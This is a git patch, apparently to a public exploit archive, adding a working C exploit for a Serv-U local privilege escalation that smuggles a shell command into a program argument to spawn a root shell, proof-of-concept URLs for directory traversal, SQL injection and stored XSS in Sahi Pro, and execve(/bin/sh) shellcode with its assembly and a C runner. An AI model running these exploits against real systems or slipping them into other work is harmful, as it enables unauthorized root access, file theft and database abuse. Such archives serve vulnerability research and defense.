From 745971e212943bdcb87151394a91ba9a0a05eaf0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 19 Jun 2019 05:01:55 +0000 Subject: [PATCH] DB: 2019-06-19 5 changes to exploits/shellcodes Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Sahi pro 7.x/8.x - Directory Traversal Sahi pro 8.x - SQL Injection Sahi pro 8.x - Cross-Site Scripting Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes) --- exploits/linux/local/47009.c | 24 ++++++++++++++ exploits/multiple/webapps/47005.txt | 22 +++++++++++++ exploits/multiple/webapps/47006.txt | 25 ++++++++++++++ exploits/multiple/webapps/47007.txt | 32 ++++++++++++++++++ files_exploits.csv | 4 +++ files_shellcodes.csv | 1 + shellcodes/linux_x86-64/47008.c | 51 +++++++++++++++++++++++++++++ 7 files changed, 159 insertions(+) create mode 100644 exploits/linux/local/47009.c create mode 100644 exploits/multiple/webapps/47005.txt create mode 100644 exploits/multiple/webapps/47006.txt create mode 100644 exploits/multiple/webapps/47007.txt create mode 100644 shellcodes/linux_x86-64/47008.c diff --git a/exploits/linux/local/47009.c b/exploits/linux/local/47009.c new file mode 100644 index 000000000..15585a1e9 --- /dev/null +++ b/exploits/linux/local/47009.c @@ -0,0 +1,24 @@ +/* + +CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation + +vulnerability found by: +Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev + +to compile and run: +gcc servu-pe-cve-2019-12181.c -o pe && ./pe + +*/ + +#include +#include +#include + +int main() +{ + char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL}; + int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args); + // if execv is successful, we won't reach here + printf("ret val: %d errno: %d\n", ret_val, errno); + return errno; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/47005.txt b/exploits/multiple/webapps/47005.txt new file mode 100644 index 000000000..45c67633e --- /dev/null +++ b/exploits/multiple/webapps/47005.txt @@ -0,0 +1,22 @@ +# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal +# Date: 17-06-2019 +# Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) +# Vendor Homepage: https://sahipro.com/ +# Software Link: https://sahipro.com/downloads-archive/ +# Version: 7.x , <= 8.x +# Tested on: Windows 10 +# CVE : CVE-2018-20470 + + +Description : + +An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. + +POC : + +vulnerable URL : + +''' replace the ip and port of the remote sahi pro server machine ''' + + +http://:/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected \ No newline at end of file diff --git a/exploits/multiple/webapps/47006.txt b/exploits/multiple/webapps/47006.txt new file mode 100644 index 000000000..cef0faafa --- /dev/null +++ b/exploits/multiple/webapps/47006.txt @@ -0,0 +1,25 @@ +# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection. +# Date: 17-06-2019 +# Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) +# Vendor Homepage: https://sahipro.com/ +# Software Link: https://sahipro.com/downloads-archive/ +# Version: 7.x , <= 8.x +# Tested on: Windows 10 +# CVE : CVE-2018-20469 +# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/ + +Description : + +An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions. + + +POC : + +vulnerable URL : + +''' replace the ip and port of the remote sahi pro server machine ''' + + +# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page. + +http://:/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS \ No newline at end of file diff --git a/exploits/multiple/webapps/47007.txt b/exploits/multiple/webapps/47007.txt new file mode 100644 index 000000000..c7d442d2d --- /dev/null +++ b/exploits/multiple/webapps/47007.txt @@ -0,0 +1,32 @@ +# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS +# Date: 17-06-2019 +# Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) +# Vendor Homepage: https://sahipro.com/ +# Software Link: https://sahipro.com/downloads-archive/ +# Version: 7.x , <= 8.x +# Tested on: Windows 10 +# CVE : CVE-2018-20472 +# POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/ + +DESCRIPTION : + +An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. Description parameter of Testcase API can be used to exploit the stored XSS. + + +POC : + +step 1 : + + create a sahi test automation script with the following content and save the file with ".sah" extension ( example : poc.sah) : + + var $tc1 = _testcase(“TC-1″,””).start(); + + _log(“testing stored XSS injection”); + + $tc1.end(); + +Step 2 : + +Execute the created script ( poc.sah ) using sahi GUI controller . + +Step 3 : navigate to the web logs console ( http://:/logs ) using the browser for the executed script. XSS is triggered . \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 79f51f6a2..8c00eb7c9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10555,6 +10555,7 @@ id,file,description,date,author,type,platform,port 46991,exploits/windows/local/46991.py,"Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow",2019-06-14,"Nipun Jaswal",local,windows, 46996,exploits/linux/local/46996.sh,"Exim 4.87 - 4.91 - Local Privilege Escalation",2019-06-17,"Marco Ivaldi",local,linux, 46998,exploits/windows/local/46998.txt,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)",2019-06-17,Gushmazuko,local,windows, +47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41408,3 +41409,6 @@ id,file,description,date,author,type,platform,port 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple, 46993,exploits/hardware/webapps/46993.txt,"CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities",2019-06-17,"Alex Akinbi",webapps,hardware, 47000,exploits/java/webapps/47000.txt,"Spring Security OAuth - Open Redirector",2019-06-17,Riemann,webapps,java, +47005,exploits/multiple/webapps/47005.txt,"Sahi pro 7.x/8.x - Directory Traversal",2019-06-18,"Goutham Madhwaraj",webapps,multiple, +47006,exploits/multiple/webapps/47006.txt,"Sahi pro 8.x - SQL Injection",2019-06-18,"Goutham Madhwaraj",webapps,multiple, +47007,exploits/multiple/webapps/47007.txt,"Sahi pro 8.x - Cross-Site Scripting",2019-06-18,"Goutham Madhwaraj",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 40093c8cb..4bf069bc4 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -970,3 +970,4 @@ id,file,description,date,author,type,platform 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64 46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86 +47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/47008.c b/shellcodes/linux_x86-64/47008.c new file mode 100644 index 000000000..a7523757a --- /dev/null +++ b/shellcodes/linux_x86-64/47008.c @@ -0,0 +1,51 @@ +Title: Linux/x86_64 - execve(/bin/sh) (22 bytes) +;Author: Aron Mihaljevic +;Architecture: Linux x86_64 +;Shellcode Length: 22 bytes +;github = https://github.com/STARRBOY + + +============ASM=========================== +global _start + +section .text + +_start: + + + + ;int execve(const char *filename, char *const argv[],char *const envp[]) + xor rsi, rsi ;clear rsi + push rsi ;push null on the stack + mov rdi, 0x68732f2f6e69622f ;/bin//sh in reverse order + push rdi + push rsp + pop rdi ;stack pointer to /bin//sh + mov al, 59 ;sys_execve + cdq ;sign extend of eax + syscall + +=======Generate Shellcode========================================== +nasm -felf64 spawn_shell.nasm -o spawn_shell.o +ld spawn_shell.o -o spawn_shell + + +=========generate C program to exploit============================= +gcc -fno-stack-protector -z execstack shell.c -o shell + +#include +#include + +unsigned char code[]= \ + "\x48\x31\xf6\x56\x48\xbf" + "\x2f\x62\x69\x6e\x2f" + "\x2f\x73\x68\x57\x54" + "\x5f\xb0\x3b\x99\x0f\x05"; +int main(){ + + printf("length of your shellcode is: %d\n", (int)strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); +} \ No newline at end of file